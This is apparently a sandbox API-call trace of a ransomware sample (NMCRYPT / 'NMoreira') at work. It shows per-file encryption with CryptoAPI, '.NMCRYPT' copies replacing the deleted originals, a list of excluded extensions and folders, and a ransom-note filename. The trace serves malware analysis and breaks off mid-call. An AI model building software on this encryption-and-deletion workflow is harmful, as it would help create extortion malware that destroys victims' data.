1 [0146.346] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.346] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.346] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.346] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.346] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.346] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.346] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.346] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.346] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.346] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.346] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.346] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.346] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.346] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.346] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.346] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.346] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.346] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.346] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.346] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.346] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.346] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.346] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.346] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.346] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.346] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.346] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.346] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.346] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.346] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.346] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.346] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.346] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.346] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.346] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.346] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.346] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.346] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.346] CryptEncrypt (in: hKey=0x8c6ba8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1d445310*, pdwDataLen=0x2d7e64c*=0xf4, dwBufLen=0xaa0 | out: pbData=0x1d445310*, pdwDataLen=0x2d7e64c*=0x100) returned 1 [0146.347] CryptEncrypt (in: hKey=0x8c6ba8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1d445410*, pdwDataLen=0x2d7e64c*=0x1c, dwBufLen=0x9a0 | out: pbData=0x1d445410*, pdwDataLen=0x2d7e64c*=0x100) returned 1 [0146.347] CryptCreateHash (in: hProv=0x8e2ef0, Algid=0x800e, hKey=0x0, dwFlags=0x0, phHash=0x1d444734 | out: phHash=0x1d444734) returned 1 [0146.347] CryptHashData (hHash=0x9ad738, pbData=0x2d7e6d0, dwDataLen=0x100, dwFlags=0x0) returned 1 [0146.347] CryptDeriveKey (in: hProv=0x8e2ef0, Algid=0x6610, hBaseData=0x9ad738, dwFlags=0x4, phKey=0x1d444738 | out: phKey=0x1d444738*=0x9ad2f8) returned 1 [0146.347] CryptSetKeyParam (hKey=0x9ad2f8, dwParam=0x1, pbData=0x2d7e7d0, dwFlags=0x0) returned 1 [0146.347] CryptSetKeyParam (hKey=0x9ad2f8, dwParam=0x4, pbData=0x2d7e680*=0x1, dwFlags=0x0) returned 1 [0146.347] wcslen (_String="\\\\?\\") returned 0x4 [0146.347] CryptDuplicateKey (in: hKey=0x9ad2f8, pdwReserved=0x0, dwFlags=0x0, phKey=0x2d7e654 | out: phKey=0x2d7e654*=0x9ad778) returned 1 [0146.347] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipsdeu.xml.NMCRYPT" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsdeu.xml.nmcrypt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x588 [0146.348] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipsdeu.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsdeu.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1624 [0146.348] GetFileSizeEx (in: hFile=0x1624, lpFileSize=0x2d7e644 | out: lpFileSize=0x2d7e644*=2616) returned 1 [0146.348] WriteFile (in: hFile=0x588, lpBuffer=0x1d445310*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d445310*, lpNumberOfBytesWritten=0x2d7e63c*=0x200, lpOverlapped=0x0) returned 1 [0146.348] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0146.349] CryptEncrypt (in: hKey=0x9ad778, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0146.349] GetLastError () returned 0x0 [0146.349] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0146.350] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0146.350] CryptEncrypt (in: hKey=0x9ad778, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0146.350] GetLastError () returned 0x0 [0146.350] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0146.350] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0146.351] CryptEncrypt (in: hKey=0x9ad778, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0146.351] GetLastError () returned 0x0 [0146.351] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0146.351] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0146.351] CryptEncrypt (in: hKey=0x9ad778, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0146.351] GetLastError () returned 0x0 [0146.351] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0146.351] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0146.351] CryptEncrypt (in: hKey=0x9ad778, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0146.351] GetLastError () returned 0x0 [0146.351] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0146.351] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0146.351] CryptEncrypt (in: hKey=0x9ad778, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0146.351] GetLastError () returned 0x0 [0146.351] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0146.351] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0146.351] CryptEncrypt (in: hKey=0x9ad778, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0146.351] GetLastError () returned 0x0 [0146.351] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0146.351] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0146.351] CryptEncrypt (in: hKey=0x9ad778, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0146.351] GetLastError () returned 0x0 [0146.351] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0146.351] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0146.352] CryptEncrypt (in: hKey=0x9ad778, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0146.352] GetLastError () returned 0x0 [0146.352] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0146.352] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0146.352] CryptEncrypt (in: hKey=0x9ad778, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0146.352] GetLastError () returned 0x0 [0146.352] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0146.352] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x38, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x38, lpOverlapped=0x0) returned 1 [0146.352] CryptEncrypt (in: hKey=0x9ad778, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x38, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x40) returned 1 [0146.352] GetLastError () returned 0x0 [0146.352] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x40, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x40, lpOverlapped=0x0) returned 1 [0146.352] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x0, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x0, lpOverlapped=0x0) returned 1 [0146.352] WriteFile (in: hFile=0x588, lpBuffer=0x1d421460*, nNumberOfBytesToWrite=0x0, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesWritten=0x2d7e63c*=0x0, lpOverlapped=0x0) returned 1 [0146.352] CloseHandle (hObject=0x1624) returned 1 [0146.352] CloseHandle (hObject=0x588) returned 1 [0146.353] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipsdeu.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsdeu.xml")) returned 0x20 [0146.353] SetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipsdeu.xml", dwFileAttributes=0x20) returned 0 [0146.353] PathFileExistsW (pszPath="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipsdeu.xml") returned 1 [0146.353] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipsdeu.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsdeu.xml")) returned 0 [0146.354] wcscpy (in: _Dest=0x2d7e194, _Source="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipsdeu.xml" | out: _Dest="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipsdeu.xml") returned="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipsdeu.xml" [0146.354] PathRemoveFileSpecW (in: pszPath="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipsdeu.xml" | out: pszPath="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink") returned 1 [0146.354] GetTempFileNameW (in: lpPathName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink", lpPrefixString=".xX", uUnique=0x0, lpTempFileName=0x2d7e39c | out: lpTempFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\.xXAE94.tmp" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\.xxae94.tmp")) returned 0xae94 [0146.354] MoveFileExW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipsdeu.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsdeu.xml"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\.xXAE94.tmp" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\.xxae94.tmp"), dwFlags=0x1) returned 0 [0146.354] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\.xXAE94.tmp" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\.xxae94.tmp")) returned 1 [0146.355] CryptDestroyKey (hKey=0x9ad778) returned 1 [0146.355] wcslen (_String="OK") returned 0x2 [0146.355] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0146.355] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0146.355] CryptDestroyKey (hKey=0x9ad2f8) returned 1 [0146.355] CryptDestroyHash (hHash=0x9ad738) returned 1 [0146.355] CryptReleaseContext (hProv=0x8e2ef0, dwFlags=0x0) returned 1 [0146.355] FindNextFileW (in: hFindFile=0x8be838, lpFindFileData=0x2d7e89c | out: lpFindFileData=0x2d7e89c) returned 1 [0146.355] PathMatchSpecW (pszFile="ipsel.xml", pszSpec="*NMCRYPT") returned 0 [0146.355] PathMatchSpecW (pszFile="ipsel.xml", pszSpec="*Recovers your files.html") returned 0 [0146.355] PathMatchSpecW (pszFile="ipsel.xml", pszSpec="*.exe") returned 0 [0146.355] PathMatchSpecW (pszFile="ipsel.xml", pszSpec="*.dll") returned 0 [0146.355] PathMatchSpecW (pszFile="ipsel.xml", pszSpec="*.lnk") returned 0 [0146.355] PathMatchSpecW (pszFile="ipsel.xml", pszSpec="*.bat") returned 0 [0146.355] PathMatchSpecW (pszFile="ipsel.xml", pszSpec="*.ini") returned 0 [0146.355] PathMatchSpecW (pszFile="ipsel.xml", pszSpec="*.msi") returned 0 [0146.355] PathMatchSpecW (pszFile="ipsel.xml", pszSpec="*.scf") returned 0 [0146.355] PathMatchSpecW (pszFile="ipsel.xml", pszSpec="*pagefile.sys*") returned 0 [0146.355] PathMatchSpecW (pszFile="ipsel.xml", pszSpec="*NTUSER.DAT*") returned 0 [0146.355] PathMatchSpecW (pszFile="ipsel.xml", pszSpec="*AppData*") returned 0 [0146.355] PathMatchSpecW (pszFile="ipsel.xml", pszSpec="*\\winrar\\*") returned 0 [0146.355] PathMatchSpecW (pszFile="ipsel.xml", pszSpec="*\\Internet Explorer\\*") returned 0 [0146.355] PathMatchSpecW (pszFile="ipsel.xml", pszSpec="*\\java\\*") returned 0 [0146.355] PathMatchSpecW (pszFile="ipsel.xml", pszSpec="*\\TeamViewer\\*") returned 0 [0146.355] PathMatchSpecW (pszFile="ipsel.xml", pszSpec="*\\windows\\*") returned 0 [0146.355] PathMatchSpecW (pszFile="ipsel.xml", pszSpec="*\\ESET\\*") returned 0 [0146.355] PathMatchSpecW (pszFile="ipsel.xml", pszSpec="*\\AVG\\*") returned 0 [0146.355] PathMatchSpecW (pszFile="ipsel.xml", pszSpec="*\\AVIRA\\*") returned 0 [0146.355] PathMatchSpecW (pszFile="ipsel.xml", pszSpec="*\\AVAST Software\\*") returned 0 [0146.355] PathMatchSpecW (pszFile="ipsel.xml", pszSpec="*Atheros*") returned 0 [0146.355] PathMatchSpecW (pszFile="ipsel.xml", pszSpec="*Realtek*") returned 0 [0146.355] PathMatchSpecW (pszFile="ipsel.xml", pszSpec="*bootmgr*") returned 0 [0146.355] PathMatchSpecW (pszFile="ipsel.xml", pszSpec="*boot*") returned 0 [0146.355] PathMatchSpecW (pszFile="ipsel.xml", pszSpec="*boot*") returned 0 [0146.355] PathMatchSpecW (pszFile="ipsel.xml", pszSpec="*CONFIG.SYS*") returned 0 [0146.355] PathMatchSpecW (pszFile="ipsel.xml", pszSpec="*IO.SYS*") returned 0 [0146.355] PathMatchSpecW (pszFile="ipsel.xml", pszSpec="*MSDOS.SYS*") returned 0 [0146.355] PathMatchSpecW (pszFile="ipsel.xml", pszSpec="*NTDETECT.COM*") returned 0 [0146.355] PathMatchSpecW (pszFile="ipsel.xml", pszSpec="*ntldr*") returned 0 [0146.355] PathMatchSpecW (pszFile="ipsel.xml", pszSpec="*chrome*") returned 0 [0146.355] PathMatchSpecW (pszFile="ipsel.xml", pszSpec="*opera*") returned 0 [0146.355] PathMatchSpecW (pszFile="ipsel.xml", pszSpec="*firefox*") returned 0 [0146.356] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipsel.xml", pszSpec="*") returned 1 [0146.356] strlen (_Str="NMoreira") returned 0x8 [0146.356] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.356] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.356] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.356] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.356] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.356] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.356] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.356] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.356] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.356] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.356] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.356] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.356] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.356] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.356] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.356] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.356] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.356] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.356] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.356] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.356] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.356] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.356] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.356] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.356] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.356] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.356] CryptGenRandom (in: 